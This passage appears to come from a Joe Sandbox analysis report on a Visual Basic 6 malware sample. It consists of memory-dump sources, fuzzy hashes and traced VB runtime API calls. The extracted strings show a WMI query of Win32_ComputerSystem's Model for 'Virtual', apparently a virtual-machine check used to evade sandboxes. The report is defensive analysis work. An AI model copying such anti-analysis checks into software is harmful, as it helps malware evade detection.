                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Free$ChkstkList$#632#653
                                                                    • String ID: (W$(W
                                                                    • API String ID: 4029463932-614157701
                                                                    • Opcode ID: eb7aff117706e4e3e5f52fb5ba017e2185688fbc0e42bb18a19f75c70cf1e63d
                                                                    • Instruction ID: 18c848341b8d3693036f4aaf529526148d049321a1e1eb37c179add0bbb5282e
                                                                    • Opcode Fuzzy Hash: eb7aff117706e4e3e5f52fb5ba017e2185688fbc0e42bb18a19f75c70cf1e63d
                                                                    • Instruction Fuzzy Hash: BF410072E00109BAD705EBA5CC46EEF77BDAF08704F20413FB611BA1E1EE7899059769
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054DB4D
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054DB81
                                                                    • #626.MSVBVM60(?,?,0000000A), ref: 0054DB92
                                                                    • __vbaVarZero.MSVBVM60(?,?,0000000A), ref: 0054DBA0
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 0054DBBB
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054DBD4
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001), ref: 0054DBF3
                                                                    • __vbaVarZero.MSVBVM60 ref: 0054DC03
                                                                    • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?), ref: 0054DC2F
                                                                    • __vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000), ref: 0054DC4B
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?), ref: 0054DC58
                                                                    • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054DC7D
                                                                    • __vbaVarDup.MSVBVM60 ref: 0054DCAB
                                                                    • #633.MSVBVM60(?,00000002,?,?,00000001), ref: 0054DCD0
                                                                    • #635.MSVBVM60(?,?,00000002,?,?,00000001), ref: 0054DCD9
                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,?,?,?,00000002,?,?,00000001), ref: 0054DCF0
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054DD5D), ref: 0054DD24
                                                                    • __vbaFreeObj.MSVBVM60(?,0054DD5D), ref: 0054DD2F
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,0054DD5D), ref: 0054DD44
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054DD4F
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054DD57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$List$CallChkstkEachLateZero$#626#633#635MoveNextUnlock
                                                                    • String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\root\cimv2
                                                                    • API String ID: 317657414-1373982563
                                                                    • Opcode ID: e4d4aa4be9f3423f22b8d8be1f3e5628de667a7605d7afd3634ff23cd3e20823
                                                                    • Instruction ID: 3e6a06cd5b650a8087825bedf185779cc272b2d27b216293f0717b97153feeb3
                                                                    • Opcode Fuzzy Hash: e4d4aa4be9f3423f22b8d8be1f3e5628de667a7605d7afd3634ff23cd3e20823
                                                                    • Instruction Fuzzy Hash: A951FAB2C0021CAADF11DBD1CD42FDEB7BDAB08304F1045AAA109B7191EB786B48CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BDFB
                                                                      • Part of subcall function 0054BD68: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BD83
                                                                      • Part of subcall function 0054BD68: __vbaRedim.MSVBVM60(00000080,00000001,0057F210,00000011,00000001,0000003F,00000000,?,?,?,?,00401006), ref: 0054BDA9
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401006), ref: 0054BE19
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401006), ref: 0054BE20
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE2E
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE47
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE51
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE5C
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE66
                                                                    • __vbaStrCat.MSVBVM60(0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE71
                                                                    • __vbaStrMove.MSVBVM60(0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE7B
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?,?,?,?,?,00401006), ref: 0054BE81
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BE91
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BE9B
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000,?), ref: 0054BEA1
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000,0040AA60,0040AA58,?,00000000,00000000), ref: 0054BEAF
                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,00000000,0040AA50,0040AA48,00000000,00000000,0040AA68,00000000,0040AA50,00000000), ref: 0054BEC6
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054BED8
                                                                    • #644.MSVBVM60(?,?), ref: 0054BEEE
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?), ref: 0054BEFA
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000040,?,?,?,?,00000040,?,?,?), ref: 0054BF1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$ErrorSystem$#644ChkstkFree$ListLockRedimUnlock
                                                                    • String ID: hW
                                                                    • API String ID: 740360539-2333751152
                                                                    • Opcode ID: 085860483c03746b3ac1e02a33d61acb9c5752ef2613a85bebfb51b6f3e8e6e8
                                                                    • Instruction ID: 26c059a15466a366855a03ee199ba7db82bebdf04c780c46b0bb6a41467758fa
                                                                    • Opcode Fuzzy Hash: 085860483c03746b3ac1e02a33d61acb9c5752ef2613a85bebfb51b6f3e8e6e8
                                                                    • Instruction Fuzzy Hash: 28310E71E40209AADB05FBA5CD46EEF777DAF08704F10413BF201BA1E2DA7899059B69
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005537CC
                                                                    • #648.MSVBVM60(0000000A), ref: 00553802
                                                                    • __vbaFreeVar.MSVBVM60(0000000A), ref: 00553814
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,0000000A), ref: 0055382D
                                                                    • __vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,?,0000000A), ref: 00553837
                                                                    • #645.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 00553852
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,00008008,00000000,?,?,?,0000000A), ref: 0055385C
                                                                    • __vbaStrCmp.MSVBVM60(0040A6F0,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 00553867
                                                                    • __vbaFreeStr.MSVBVM60(0040A6F0,00000000,?,00000000,00008008,00000000,?,?,?,0000000A), ref: 0055387A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#645#648ChkstkMoveNofreeVarg
                                                                    • String ID: xW$xW
                                                                    • API String ID: 3980291390-1681284970
                                                                    • Opcode ID: bb7cabd978e29afebbeafa143eea748451fed2ab610963d05bf09202d8fc4786
                                                                    • Instruction ID: 97d6532df679a69d5f7e8d09fba2752f7c2a71749c45a685d22e806331d2b115
                                                                    • Opcode Fuzzy Hash: bb7cabd978e29afebbeafa143eea748451fed2ab610963d05bf09202d8fc4786
                                                                    • Instruction Fuzzy Hash: 9D418474900209EBCB04EF95C895EAE7BB8BF08744F10846AF915FB2A2DB78D945CB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 00550505
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 00550546
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE8C,000000A0), ref: 00550590
                                                                    • __vbaStrCmp.MSVBVM60(password,?), ref: 005505AC
                                                                    • __vbaFreeStr.MSVBVM60(password,?), ref: 005505C2
                                                                    • __vbaFreeObj.MSVBVM60(password,?), ref: 005505CA
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057E408,0040BDF4,000002B4), ref: 00550614
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 0055065D
                                                                    • __vbaVarDup.MSVBVM60(password,?), ref: 00550676
                                                                    • #595.MSVBVM60(?,00000000,?,0000000A,0000000A,password,?), ref: 0055068D
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A,?,00000000,?,0000000A,0000000A,password,?), ref: 005506A4
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 005506BF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE8C,00000204), ref: 00550705
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040BE8C,00000204), ref: 0055071C
                                                                    • #599.MSVBVM60({Home}+{End},0000000A), ref: 00550738
                                                                    • __vbaFreeVar.MSVBVM60({Home}+{End},0000000A), ref: 00550740
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$#595#599ChkstkList
                                                                    • String ID: password${Home}+{End}
                                                                    • API String ID: 938176104-3822402063
                                                                    • Opcode ID: a743f720d9426fa8a0c697e0b0d29b68418cd07bb97ae004eba38f3db86ec356
                                                                    • Instruction ID: 37673d155d3564d1cabb16856cb0f512f6dffe1b719a5c6a4c00f2bf0138deb7
                                                                    • Opcode Fuzzy Hash: a743f720d9426fa8a0c697e0b0d29b68418cd07bb97ae004eba38f3db86ec356
                                                                    • Instruction Fuzzy Hash: D161F471900308AFCB11EF94C845BDDBBB8FF09304F5084AAE659BB1A1D7789A89CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E599
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054E5B2
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054E5D1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E603
                                                                    • __vbaVarCmpGt.MSVBVM60(?,0057F2C0,00008003,0000000B), ref: 0054E64F
                                                                    • __vbaVarOr.MSVBVM60(?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E659
                                                                    • __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E65F
                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E66B
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,0057F220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E694
                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0054E6A6
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E6E6
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054E6FE
                                                                    • __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054E724
                                                                    • __vbaFreeObj.MSVBVM60(0054E767,?,00006011,?), ref: 0054E761
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$AddrefBoolChkstkLockNullRedimUnlock
                                                                    • String ID: XW
                                                                    • API String ID: 4045727025-708546550
                                                                    • Opcode ID: ffb54d90cea678a8efa00e1a84d3e08220a43109d3210807311811089c7a710f
                                                                    • Instruction ID: 1250d479dc8a66035b15dacb456d53146b2b4a80ba058434663b20d9049508d9
                                                                    • Opcode Fuzzy Hash: ffb54d90cea678a8efa00e1a84d3e08220a43109d3210807311811089c7a710f
                                                                    • Instruction Fuzzy Hash: 7E51E871900218AADF10EFA4DC8AFDDBBB9FF18318F14452AE105BB1A2D7799944DB14
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 00552FA0
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 00552FE1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 00553025
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000058), ref: 00553060
                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00553081
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B9B4,000000E0), ref: 005530B6
                                                                    • __vbaStrI2.MSVBVM60(?), ref: 005530C7
                                                                    • __vbaStrMove.MSVBVM60(?), ref: 005530D1
                                                                    • #690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 005530E4
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 005530F3
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00401006), ref: 00553105
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$FreeList$#690ChkstkMoveNew2
                                                                    • String ID: HW$HW$Options$Show Tips at Startup
                                                                    • API String ID: 557462102-2382638233
                                                                    • Opcode ID: 55f28711627c9eb550d7ba32209dc362c5a424a429da4214ab6d99533c486756
                                                                    • Instruction ID: c1a1123dd436b0eca066619acdd5979bf56fac2018e560e2c0970a476aab885d
                                                                    • Opcode Fuzzy Hash: 55f28711627c9eb550d7ba32209dc362c5a424a429da4214ab6d99533c486756
                                                                    • Instruction Fuzzy Hash: 8E51D271D00208AFCB01DFA4D99AFDDBBB5FF08745F10802AF905BB2A1D77899489B94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BC2A
                                                                    • __vbaVarDup.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC42
                                                                    • #644.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC4D
                                                                    • __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401006), ref: 0054BC57
                                                                    • #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054BCB3
                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCCE
                                                                    • __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCD8
                                                                    • __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCE0
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054BD01
                                                                    • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054BD0B
                                                                    • __vbaFreeVar.MSVBVM60(0054BD4A,00000000,?,00000000,?,00000002,?), ref: 0054BD44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$FreeMove$#644#697Chkstk
                                                                    • String ID: HW
                                                                    • API String ID: 4043317205-1255872628
                                                                    • Opcode ID: 60ad7dcfc817ee44a4547464f6f8e05689c0ec7868396bab93b7bc833ec587b4
                                                                    • Instruction ID: bbc48c9d2764cca06509000bb01c17a1e6cf92c871368da9774195b6b0e22524
                                                                    • Opcode Fuzzy Hash: 60ad7dcfc817ee44a4547464f6f8e05689c0ec7868396bab93b7bc833ec587b4
                                                                    • Instruction Fuzzy Hash: 03315E758402489BDB01EB91DD81BDE7BB8BF14308F20456AB005FB162DB78AE48EB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C5D1
                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401006), ref: 0054C5E9
                                                                    • #526.MSVBVM60(?,00000104,?,?,?,?,00401006), ref: 0054C5F7
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C600
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C60A
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000104,?,?,?,?,00401006), ref: 0054C612
                                                                      • Part of subcall function 0057D1B6: __vbaChkstk.MSVBVM60(00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1D1
                                                                      • Part of subcall function 0057D1B6: __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1E9
                                                                      • Part of subcall function 0057D1B6: __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F3
                                                                      • Part of subcall function 0057D1B6: #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F9
                                                                      • Part of subcall function 0057D1B6: __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D204
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C65C
                                                                    • #616.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C673
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C67D
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C68C
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000104,00004008,?,?,?,00004008), ref: 0054C697
                                                                    • __vbaFreeStr.MSVBVM60(0054C6CF,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C6C1
                                                                    • __vbaFreeStr.MSVBVM60(0054C6CF,?,?,00000104,00004008,?,?,?,00004008), ref: 0054C6C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CopyMove$Chkstk$#526#616#644ErrorNofreeSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 299759716-0
                                                                    • Opcode ID: c325827158d77c2a52631c68648fb7406552d50be9c4d7def712a9aff968c63f
                                                                    • Instruction ID: 85d55ac9c69c9d96d09d4a9bc20eeac7fa1a708cdb15fb9a1b8b0195f0a5a14d
                                                                    • Opcode Fuzzy Hash: c325827158d77c2a52631c68648fb7406552d50be9c4d7def712a9aff968c63f
                                                                    • Instruction Fuzzy Hash: E831DE71D012099BCF04EFE1C946ADEBBB5BF48708F50842AE201BB1A5EB385A45CF94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006), ref: 0054E3DA
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E338,?,?,?,00000000,00401006), ref: 0054E3F3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E425
                                                                    • #526.MSVBVM60(?,00007FFF), ref: 0054E44B
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 0054E454
                                                                    • __vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 0054E45E
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 0054E466
                                                                    • #644.MSVBVM60(?,?,?,00007FFF), ref: 0054E46E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E4A6
                                                                    • __vbaFreeObj.MSVBVM60(0054E4DF), ref: 0054E4D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
